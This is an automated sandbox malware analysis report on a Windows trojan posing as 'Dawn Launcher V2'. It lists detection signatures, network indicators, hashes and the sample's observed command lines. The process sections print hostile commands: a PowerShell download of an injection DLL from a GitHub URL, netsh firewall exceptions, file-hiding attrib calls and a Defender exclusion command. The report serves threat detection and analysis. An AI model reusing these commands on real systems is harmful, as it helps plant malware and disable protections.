Malware Analysis Report

2025-08-10 22:52

Sample ID 240107-x3a4lsdcc2
Target aa947ac87e8151f7a183a3ce9b0d5860.exe
SHA256 ca1cabde17679a02f29582e8e15a59936bb6aea4c54793e1e01e1c2305c8b6a0
Tags
evasion
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ca1cabde17679a02f29582e8e15a59936bb6aea4c54793e1e01e1c2305c8b6a0

Threat Level: Known bad

The file aa947ac87e8151f7a183a3ce9b0d5860.exe was found to be: Known bad.

Malicious Activity Summary

evasion

Contains code to disable Windows Defender

Sets file to hidden

Modifies Windows Firewall

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-07 19:22

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-07 19:22

Reported

2024-01-07 19:25

Platform

win10v2004-20231222-en

Max time kernel

1s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Legitimate hosting services abused for malware hosting/C2

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\Dawn.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe

"C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"

C:\Users\Admin\AppData\Local\Temp\tmp5B5E.tmpDawn Launcher V2.exe

"C:\Users\Admin\AppData\Local\Temp\tmp5B5E.tmpDawn Launcher V2.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Roaming\Dawn.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Users\Admin\AppData\Roaming\Dawn.exe

"C:\Users\Admin\AppData\Roaming\Dawn.exe"

C:\Users\Admin\AppData\Local\Temp\tmp76E5.tmpDawn Launcher V2.exe

"C:\Users\Admin\AppData\Local\Temp\tmp76E5.tmpDawn Launcher V2.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\inj.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/SInject2.dll','C:\Users\Admin\AppData\Roaming\SInject2.dll');exit

C:\Windows\SysWOW64\certutil.exe

certutil -encode C:\Users\Admin\AppData\Roaming\SInject1.exe C:\Users\Admin\AppData\Roaming\SInject3.bin

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5020 -ip 5020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 2620

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 83.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 4.181.190.20.in-addr.arpa udp
FR 51.38.37.194:7981 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
FR 51.38.37.194:7981 tcp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 4.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 100.5.17.2.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 77.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 137.71.91.104.in-addr.arpa udp
US 52.111.227.11:443 tcp
GB 96.17.179.48:80 tcp
GB 96.17.179.48:80 tcp
GB 96.17.179.48:80 tcp
US 204.79.197.200:443 tcp
US 204.79.197.200:443 tcp
US 204.79.197.200:443 tcp
US 204.79.197.200:443 tcp
US 204.79.197.200:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
GB 88.221.135.217:80 tcp

Files

memory/5116-0-0x0000000075390000-0x0000000075B40000-memory.dmp

memory/5116-1-0x00000000004A0000-0x00000000012D6000-memory.dmp

memory/5116-3-0x0000000005CF0000-0x0000000005D8C000-memory.dmp

memory/5116-2-0x0000000006200000-0x00000000067A4000-memory.dmp

memory/5116-5-0x0000000005F40000-0x0000000005F50000-memory.dmp

memory/5116-4-0x0000000005D90000-0x0000000005DF6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp5B5E.tmpDawn Launcher V2.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1232-14-0x00007FFE4C510000-0x00007FFE4C512000-memory.dmp

memory/1232-16-0x00007FFE4C530000-0x00007FFE4C532000-memory.dmp

memory/1232-17-0x0000000140000000-0x0000000141F88000-memory.dmp

memory/1232-21-0x00007FFE4C570000-0x00007FFE4C572000-memory.dmp

memory/1232-27-0x00007FFE4C5D0000-0x00007FFE4C5D2000-memory.dmp

memory/1232-26-0x00007FFE4C5C0000-0x00007FFE4C5C2000-memory.dmp

memory/1232-29-0x00007FFE4C5F0000-0x00007FFE4C5F2000-memory.dmp

memory/1232-31-0x00007FFE4C610000-0x00007FFE4C612000-memory.dmp

memory/1232-30-0x00007FFE4C600000-0x00007FFE4C602000-memory.dmp

memory/1232-32-0x0000000140000000-0x0000000141F88000-memory.dmp

memory/1232-28-0x00007FFE4C5E0000-0x00007FFE4C5E2000-memory.dmp

memory/1232-25-0x00007FFE4C5B0000-0x00007FFE4C5B2000-memory.dmp

memory/1232-24-0x00007FFE4C5A0000-0x00007FFE4C5A2000-memory.dmp

memory/1232-23-0x00007FFE4C590000-0x00007FFE4C592000-memory.dmp

memory/1232-22-0x00007FFE4C580000-0x00007FFE4C582000-memory.dmp

memory/1232-20-0x00007FFE4C560000-0x00007FFE4C562000-memory.dmp

memory/1232-19-0x00007FFE4C550000-0x00007FFE4C552000-memory.dmp

memory/1232-18-0x00007FFE4C540000-0x00007FFE4C542000-memory.dmp

memory/1232-15-0x00007FFE4C520000-0x00007FFE4C522000-memory.dmp

memory/5116-40-0x0000000075390000-0x0000000075B40000-memory.dmp

memory/5020-43-0x0000000075310000-0x0000000075AC0000-memory.dmp

memory/5020-44-0x0000000005A50000-0x0000000005A60000-memory.dmp

memory/1232-53-0x0000000140000000-0x0000000141F88000-memory.dmp

memory/3128-71-0x0000000140000000-0x0000000141F88000-memory.dmp

memory/3128-75-0x0000000140000000-0x0000000141F88000-memory.dmp

memory/5020-78-0x0000000075310000-0x0000000075AC0000-memory.dmp

memory/5020-83-0x0000000005A50000-0x0000000005A60000-memory.dmp

memory/1620-87-0x0000000002B00000-0x0000000002B10000-memory.dmp

memory/1620-88-0x0000000005530000-0x0000000005B58000-memory.dmp

memory/1620-90-0x0000000005B60000-0x0000000005BC6000-memory.dmp

memory/1620-100-0x0000000005ED0000-0x0000000006224000-memory.dmp

memory/1620-89-0x0000000005400000-0x0000000005422000-memory.dmp

memory/1620-101-0x00000000063C0000-0x00000000063DE000-memory.dmp

memory/1620-102-0x0000000006400000-0x000000000644C000-memory.dmp

memory/1620-86-0x0000000002B00000-0x0000000002B10000-memory.dmp

memory/1620-85-0x0000000075310000-0x0000000075AC0000-memory.dmp

memory/1620-84-0x0000000002AA0000-0x0000000002AD6000-memory.dmp

memory/1620-104-0x00000000068C0000-0x00000000068DA000-memory.dmp

memory/1620-103-0x0000000007AC0000-0x000000000813A000-memory.dmp

memory/1620-110-0x0000000075310000-0x0000000075AC0000-memory.dmp

memory/5020-111-0x0000000075310000-0x0000000075AC0000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-07 19:22

Reported

2024-01-07 19:25

Platform

win7-20231129-en

Max time kernel

5s

Max time network

140s

Command Line

"C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\libcrypto-1_1.dll C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe N/A
File created C:\Windows\SysWOW64\libssl-1_1.dll C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe

"C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"

C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe

"C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Roaming\Dawn.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Users\Admin\AppData\Roaming\Dawn.exe

"C:\Users\Admin\AppData\Roaming\Dawn.exe"

C:\Users\Admin\AppData\Local\Temp\tmp3717.tmpDawn Launcher V2.exe

"C:\Users\Admin\AppData\Local\Temp\tmp3717.tmpDawn Launcher V2.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/SInject2.dll','C:\Users\Admin\AppData\Roaming\SInject2.dll');exit

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\inj.bat" "

C:\Windows\SysWOW64\certutil.exe

certutil -encode C:\Users\Admin\AppData\Roaming\SInject1.exe C:\Users\Admin\AppData\Roaming\SInject3.bin

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,vbs,bat,hta,lnk,dll,ps1;exit

Network

Country Destination Domain Proto
FR 51.38.37.194:7981 tcp
FR 51.38.37.194:7981 tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 Buju.duckdns.org udp
NL 91.109.190.7:4040 Buju.duckdns.org tcp
NL 91.109.190.7:4040 Buju.duckdns.org tcp
NL 91.109.190.7:4040 Buju.duckdns.org tcp
US 8.8.8.8:53 Buju.duckdns.org udp
NL 91.109.190.7:4040 Buju.duckdns.org tcp
NL 91.109.190.7:4040 Buju.duckdns.org tcp

Files

memory/2320-1-0x00000000010B0000-0x0000000001EE6000-memory.dmp

memory/2320-0-0x0000000073F30000-0x000000007461E000-memory.dmp

\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe

MD5 023866645753eaaf44d90d52b1318774
SHA1 494b387fbf69c9217c7a59dff4c583c58ae97087
SHA256 073e485754cba379c158a1e74cb9d38980cd7aa2bf209b3b43e96b8112a67644
SHA512 f0f6e62a36fe8180354af223ea7851eb2933267b0b1da8a6d84d3737156df168ffe6f0da0674f77bf68a1203375828dc0bf72ae4351ffedb3f1a0bc0b80a82be

C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe

MD5 7cb160b0abe15b3cea529ca00f880b63
SHA1 c620a6386f68ff31251e1fe0f774fde80d40399f
SHA256 cc594ca27a74f5c1ab71db3c980c8cb0007a23a84414f3a32ebc92ea95ec82cd
SHA512 9ab45cc406634b30dfd0686bf2f6c502a1f09f85ddd31048473ce3e7ad681296ff2aad69cbb8a2e978272a5194528d8df25336c555e5e8af15b3338808b67936

\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe

MD5 dd17771ebc61382ea1d84832cd2d886a
SHA1 e2ea1805181ee8beb5d717e6679a3eada8b46d66
SHA256 9c818d0262c7d1c2ec2c1271ceed8bbb6259341f3d880337afaea0dd772e322e
SHA512 56089fb66283b771d2e0f7674624c418c0b7d41bf7430df8965207a2bdbffda8ee862913892f0a8da7cfa208e864f3fdc64336c46f1094fb29f1d34154df528d

C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe

MD5 4742731bb77c1d125809906c7dafee17
SHA1 c70c2452a184ee3dbaeb5f566569bc235648844d
SHA256 93ee7f985541332f97d1379c180b31dc185ce283cb32e93115bb75650c33e370
SHA512 414563c70b97e957cfbc76d344dd64e8a67bdadd606a59178a0b96f80778c42ffaad7e4d4e58dfefbb5982a699165a0ba4d171d006345e79937780d7b63a40b9

memory/2088-14-0x0000000076EE0000-0x0000000076EE2000-memory.dmp

memory/2088-17-0x0000000076EF0000-0x0000000076EF2000-memory.dmp

memory/2088-25-0x0000000076F00000-0x0000000076F02000-memory.dmp

memory/2088-36-0x0000000076F20000-0x0000000076F22000-memory.dmp

memory/2088-42-0x0000000076F30000-0x0000000076F32000-memory.dmp

memory/2088-48-0x0000000076F40000-0x0000000076F42000-memory.dmp

memory/2088-50-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/2088-54-0x0000000076F50000-0x0000000076F52000-memory.dmp

memory/2088-65-0x0000000076F70000-0x0000000076F72000-memory.dmp

memory/2320-67-0x0000000073F30000-0x000000007461E000-memory.dmp

memory/2088-78-0x0000000076F90000-0x0000000076F92000-memory.dmp

memory/2088-81-0x0000000076FA0000-0x0000000076FA2000-memory.dmp

memory/2088-86-0x0000000140000000-0x0000000141F88000-memory.dmp

memory/2088-88-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/2088-94-0x0000000076FB0000-0x0000000076FB2000-memory.dmp

memory/2088-92-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/2088-79-0x0000000076FA0000-0x0000000076FA2000-memory.dmp

memory/2088-109-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/2088-76-0x0000000076F90000-0x0000000076F92000-memory.dmp

memory/2088-74-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/2088-73-0x0000000076F90000-0x0000000076F92000-memory.dmp

memory/2088-72-0x0000000076F80000-0x0000000076F82000-memory.dmp

memory/2088-70-0x0000000076F80000-0x0000000076F82000-memory.dmp

memory/2088-69-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/2088-66-0x0000000076F80000-0x0000000076F82000-memory.dmp

memory/2088-63-0x0000000076F70000-0x0000000076F72000-memory.dmp

memory/2088-61-0x0000000076F70000-0x0000000076F72000-memory.dmp

memory/2088-60-0x0000000076F60000-0x0000000076F62000-memory.dmp

memory/2088-58-0x0000000076F60000-0x0000000076F62000-memory.dmp

memory/2088-56-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/2088-55-0x0000000076F60000-0x0000000076F62000-memory.dmp

memory/2088-52-0x0000000076F50000-0x0000000076F52000-memory.dmp

memory/2088-49-0x0000000076F50000-0x0000000076F52000-memory.dmp

memory/2088-46-0x0000000076F40000-0x0000000076F42000-memory.dmp

memory/2088-44-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/2088-43-0x0000000076F40000-0x0000000076F42000-memory.dmp

memory/2088-40-0x0000000076F30000-0x0000000076F32000-memory.dmp

memory/2088-38-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/2088-37-0x0000000076F30000-0x0000000076F32000-memory.dmp

memory/2088-34-0x0000000076F20000-0x0000000076F22000-memory.dmp

memory/2088-32-0x0000000076F20000-0x0000000076F22000-memory.dmp

memory/2088-31-0x0000000076F10000-0x0000000076F12000-memory.dmp

memory/2088-29-0x0000000076F10000-0x0000000076F12000-memory.dmp

memory/2088-27-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/2088-26-0x0000000076F10000-0x0000000076F12000-memory.dmp

memory/2088-23-0x0000000076F00000-0x0000000076F02000-memory.dmp

memory/2088-21-0x0000000076F00000-0x0000000076F02000-memory.dmp

memory/2088-20-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/2088-19-0x0000000076EF0000-0x0000000076EF2000-memory.dmp

memory/2088-15-0x0000000076EF0000-0x0000000076EF2000-memory.dmp

memory/2088-12-0x0000000076EE0000-0x0000000076EE2000-memory.dmp

memory/2088-10-0x0000000140000000-0x0000000141F88000-memory.dmp

memory/2088-9-0x0000000076EE0000-0x0000000076EE2000-memory.dmp

memory/2320-116-0x0000000073F30000-0x000000007461E000-memory.dmp

memory/872-119-0x0000000073EA0000-0x000000007458E000-memory.dmp

memory/872-121-0x00000000009F0000-0x0000000001826000-memory.dmp

memory/2088-120-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/2088-128-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/2088-129-0x0000000140000000-0x0000000141F88000-memory.dmp

memory/3060-143-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/3060-163-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/3060-173-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/3060-152-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/3060-180-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/3060-191-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/3060-197-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/3060-202-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/872-214-0x0000000073EA0000-0x000000007458E000-memory.dmp

memory/3060-216-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/3060-226-0x0000000140000000-0x0000000141F88000-memory.dmp

memory/3060-228-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/3060-231-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/872-232-0x0000000005530000-0x0000000005570000-memory.dmp

memory/3060-234-0x0000000076D30000-0x0000000076ED9000-memory.dmp

memory/3060-233-0x0000000140000000-0x0000000141F88000-memory.dmp

memory/2660-251-0x00000000028B0000-0x00000000028F0000-memory.dmp

memory/2660-252-0x000000006E510000-0x000000006EABB000-memory.dmp

memory/2660-250-0x00000000028B0000-0x00000000028F0000-memory.dmp

memory/2660-249-0x00000000028B0000-0x00000000028F0000-memory.dmp

memory/2660-248-0x000000006E510000-0x000000006EABB000-memory.dmp

memory/2660-255-0x000000006E510000-0x000000006EABB000-memory.dmp

memory/872-256-0x0000000005530000-0x0000000005570000-memory.dmp

memory/2424-271-0x000000006E380000-0x000000006E92B000-memory.dmp

memory/2424-273-0x000000006E380000-0x000000006E92B000-memory.dmp

memory/2476-274-0x000000006E380000-0x000000006E92B000-memory.dmp

memory/2424-276-0x0000000002960000-0x00000000029A0000-memory.dmp

memory/2424-277-0x000000006E380000-0x000000006E92B000-memory.dmp

memory/2476-279-0x000000006E380000-0x000000006E92B000-memory.dmp

memory/2476-278-0x000000006E380000-0x000000006E92B000-memory.dmp

memory/2476-275-0x0000000002B60000-0x0000000002BA0000-memory.dmp

memory/2424-272-0x0000000002960000-0x00000000029A0000-memory.dmp

memory/2476-280-0x000000006E380000-0x000000006E92B000-memory.dmp